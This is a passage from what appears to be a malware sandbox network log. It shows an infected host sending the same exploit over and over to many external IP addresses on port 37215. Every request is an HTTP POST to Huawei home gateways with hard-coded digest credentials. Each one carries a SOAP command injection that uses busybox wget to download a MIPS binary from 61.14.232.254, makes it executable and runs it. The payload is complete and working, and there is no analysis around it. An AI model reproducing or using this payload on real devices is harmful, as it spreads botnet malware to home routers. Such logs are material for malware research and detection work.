69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  728192.168.2.1349446157.214.90.5737215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:14.378606081 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  729192.168.2.1358416197.244.111.10437215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:14.378784895 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  730192.168.2.1353086217.33.106.6837215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:14.378803015 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  731192.168.2.135982634.194.207.5537215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:14.378859043 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  732192.168.2.1346034157.178.186.20437215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:14.378882885 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  733192.168.2.1350626136.219.185.9437215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:16.413440943 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  734192.168.2.135110041.106.164.7537215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:16.413543940 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  735192.168.2.1335714157.119.234.20337215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:16.413608074 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  736192.168.2.1356028160.137.71.15337215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:16.413641930 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  737192.168.2.1353914160.14.98.1937215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:16.413728952 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  738192.168.2.1335424197.68.161.4037215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:16.414105892 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
